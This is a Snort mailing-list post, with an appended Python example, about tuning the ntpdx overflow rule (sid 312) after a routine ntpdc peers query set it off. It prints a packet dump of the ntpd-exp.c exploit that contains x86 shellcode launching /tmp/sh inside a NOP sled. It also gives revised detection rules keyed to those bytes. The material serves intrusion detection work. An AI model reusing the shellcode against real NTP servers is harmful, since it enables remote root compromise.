Snort mailing list archives
ntpdx overflow attempt sig triggered by ntpdc query
From: "James-lists" <hackerwacker () cybermesa com>
Date: Sat, 14 Dec 2002 04:06:08 -0700
I was able to trigger this rule by doing "ntpdc -c peers <peer address>". Ntpdc used is the current version of NTP & NTPD by David Mills. The RON box we host set this off and the researcher pointed out to me this was just an ntpdc query from him.

[**] [1:312:2] EXPLOIT ntpdx overflow attempt [**]
[Classification: Attempted Administrator Privilege Gain] [Priority: 1]
12/14-00:58:02.732689 mrtg:57985 -> tarpit:123
UDP TTL:64 TOS:0x0 ID:34983 IpLen:20 DgmLen:188 DF
Len: 168
[Xref => bugtraq 2540][Xref => arachnids 492]

alert udp $EXTERNAL_NET any -> $HOME_NET 123 (msg:"EXPLOIT ntpdx overflow attempt"; dsize: >128; reference:arachnids,492; reference:bugtraq,2540; classtype:attempted-admin; sid:312; rev:2;)

My hacked rule revisions, comments please:

alert udp $EXTERNAL_NET any -> $HOME_NET 123 (msg:"EXPLOIT ntpdx overflow attempt"; dsize: >188; \
content:"|80 E8 DC FF FF FF 2F 74 6D 70 2F 73 68 90 90 90|"; reference:arachnids,492; reference:bugtraq,2540; classtype:attempted-admin; sid:312; \
rev:3;)

or

alert udp $EXTERNAL_NET any -> $HOME_NET 123 (msg:"EXPLOIT ntpdx overflow attempt"; dsize: >188; \
content:"/tmp/sh"; reference:arachnids,492; reference:bugtraq,2540; classtype:attempted-admin; sid:312; rev:3;)

James

[root@tarpit]# ntpdc -c peers mrtg

[root@mrtg james]# tcpdump -v -E type host mrtg and udp port 123
tcpdump: listening on eth0
03:19:30.262385 tarpit.58596 > mrtg..ntp: [len=160] v2 res2 strat 0 poll 2 prec 1 dist 0.000000 disp 0.000000 ref (unspec)@0.000000000 orig 0.000000000 rec -0.000000000 xmt -0.000000000 (DF) (ttl 64, id 31704, len 188)
03:19:30.262442 tarpit.58596 > mrtg.ntp: [len=160] v2 res2 strat 0 poll 2 prec 1 dist 0.000000 disp 0.000000 ref (unspec)@0.000000000 orig 0.000000000 rec -0.000000000 xmt -0.000000000 (DF) (ttl 63, id 31704, len 188)
03:19:30.262970 mrtg.ntp > tarpit.58596: [len=136] v2 -1s res2 strat 0 poll 2 prec 1 dist 4.000488 disp 16659.015945 ref (unspec)@8061450.042957365 orig 38.000000000 rec +10622733.000000226 xmt +83886042.254196226 (DF) [tos 0x10] (ttl 64, id 0, len 164)
03:19:30.263110 mrtg.ntp > tarpit.58596: [len=136] v2 -1s res2 strat 0 poll 2 prec 1 dist 4.000488 disp 16659.015945 ref (unspec)@8061450.042957365 orig 38.000000000 rec +10622733.000000226 xmt +83886042.254196226 (DF) [tos 0x10] (ttl 63, id 0, len 164)

All other ntp query types I tried were less than len 188.

Exploit, from Whitehats:

This is a trace of the ntp exploit "ntpd-exp.c" found on securityfocus.com which was written by babcia padlina ltd.

04/09-12:28:17.176237 192.0.0.10:1109 -> 192.0.0.1:123
UDP TTL:64 TOS:0x0 ID:60376 IpLen:20 DgmLen:540
Len: 520
16 02 00 01 00 00 00 00 00 00 01 36 73 74 72 61  ...........6stra
74 75 6D 3D 90 90 90 90 90 90 90 90 90 90 90 90  tum=............
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
EB 1F 5E 89 76 08 31 C0 88 46 07 89 46 0C B0 0B  ..^.v.1..F..F...
89 F3 8D 4E 08 8D 56 0C CD 80 31 DB 89 D8 40 CD  ...N..V...1...@.
80 E8 DC FF FF FF 2F 74 6D 70 2F 73 68 90 90 90  ....../tmp/sh...
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
77 F7 FF BF 77 F7 FF BF 90 90 90 90 90 90 90 90  w...w...........
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
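The following is an added example, not code from James's post or from the Snort project. It reproduces the one point the thread turns on: Snort's dsize option compares against the application payload (the [len=160] of the tcpdump line, i.e. Len 168 minus the 8-byte UDP header), and ntpdc's mode 7 requests are padded to a fixed size, so the original sid 312 rev 2 rule fires on a routine peers query. The tiny rule evaluator below parses the dsize and content options from the three rules quoted in the post (including the |xx xx| hex syntax) and runs them over two constructed packets: a 160-byte mode 7 request standing in for the ntpdc query, and a 512-byte packet shaped like the Whitehats trace that carries the "stratum=" prefix, NOP filler and the /tmp/sh string but no instructions. Both packets and the mode 7 header bytes are assumptions made for the example, not captures.

```python
import re

# Constructed sample payloads (stand-ins, not captures from the post).
# 1) An ntpdc "peers" request. First byte 0x17 = NTP version 2, mode 7 (the
#    private mode ntpdc speaks); the rest is zero padding to the 160 bytes
#    shown as [len=160] in the tcpdump above. Header bytes are an assumption.
NTPDC_PEERS_REQUEST = bytes([0x17, 0x00, 0x03, 0x00]) + b"\x00" * 156

# 2) A 512-byte packet shaped like the Whitehats trace (DgmLen 540 - 20 - 8):
#    same first twelve bytes and "stratum=" prefix, NOP filler, the /tmp/sh
#    string, then more filler. It contains no instructions: detection sample only.
_prefix = bytes.fromhex("16 02 00 01 00 00 00 00 00 00 01 36") + b"stratum="
OVERFLOW_SAMPLE = (_prefix + b"\x90" * 200 + b"/tmp/sh").ljust(512, b"\x90")

SAMPLES = {"ntpdc_peers": NTPDC_PEERS_REQUEST, "overflow_sample": OVERFLOW_SAMPLE}

# The three rules from the post, with the line continuations joined.
_TAIL = ('reference:arachnids,492; reference:bugtraq,2540; '
         'classtype:attempted-admin; sid:312; ')
_HEAD = ('alert udp $EXTERNAL_NET any -> $HOME_NET 123 '
         '(msg:"EXPLOIT ntpdx overflow attempt"; ')
RULE_SID312_REV2 = _HEAD + 'dsize: >128; ' + _TAIL + 'rev:2;)'
RULE_REV3_HEX = (_HEAD + 'dsize: >188; '
                 'content:"|80 E8 DC FF FF FF 2F 74 6D 70 2F 73 68 90 90 90|"; '
                 + _TAIL + 'rev:3;)')
RULE_REV3_STRING = _HEAD + 'dsize: >188; content:"/tmp/sh"; ' + _TAIL + 'rev:3;)'

RULES = {"sid312_rev2": RULE_SID312_REV2,
         "rev3_hex": RULE_REV3_HEX,
         "rev3_string": RULE_REV3_STRING}


def decode_content(spec: str) -> bytes:
    """Expand a Snort content string: text outside |...| is literal,
    text inside |...| is space-separated hex bytes."""
    out = bytearray()
    for i, part in enumerate(spec.split("|")):
        out += bytes.fromhex(part) if i % 2 else part.encode("latin-1")
    return bytes(out)


def parse_rule(rule: str) -> dict:
    """Pull out the two options this evaluator understands: dsize and content."""
    opts = {"content": [decode_content(c)
                        for c in re.findall(r'content:\s*"([^"]*)"', rule)]}
    m = re.search(r'dsize:\s*([<>]?)\s*(\d+)', rule)
    if m:
        opts["dsize"] = (m.group(1) or "=", int(m.group(2)))
    return opts


def rule_matches(rule: str, payload: bytes) -> bool:
    """Apply dsize to the application payload (as Snort does), then require
    every content clause to appear somewhere in the payload."""
    opts = parse_rule(rule)
    if "dsize" in opts:
        op, n = opts["dsize"]
        size = len(payload)
        if not {"<": size < n, ">": size > n, "=": size == n}[op]:
            return False
    return all(c in payload for c in opts["content"])


def evaluate(rules: dict, samples: dict) -> dict:
    """Return {rule_name: {sample_name: fired}} for every rule/sample pair."""
    return {rn: {sn: rule_matches(r, p) for sn, p in samples.items()}
            for rn, r in rules.items()}


if __name__ == "__main__":
    for name, hits in evaluate(RULES, SAMPLES).items():
        print(f"{name:12s} {hits}")
```

Running it shows rev 2 firing on both packets (160 and 512 bytes both exceed 128), while both rev 3 variants stay quiet on the padded ntpdc query because of the dsize:>188 floor. The two revisions differ on the second packet: the /tmp/sh string is present, so the string rule fires, but the 16-byte hex clause is a byte-exact match on one sample's shellcode and finds nothing in a packet that differs from that sample. A content clause tied to a string the overflow must carry is therefore the more durable of the two, and the dsize floor is what removes the false positive.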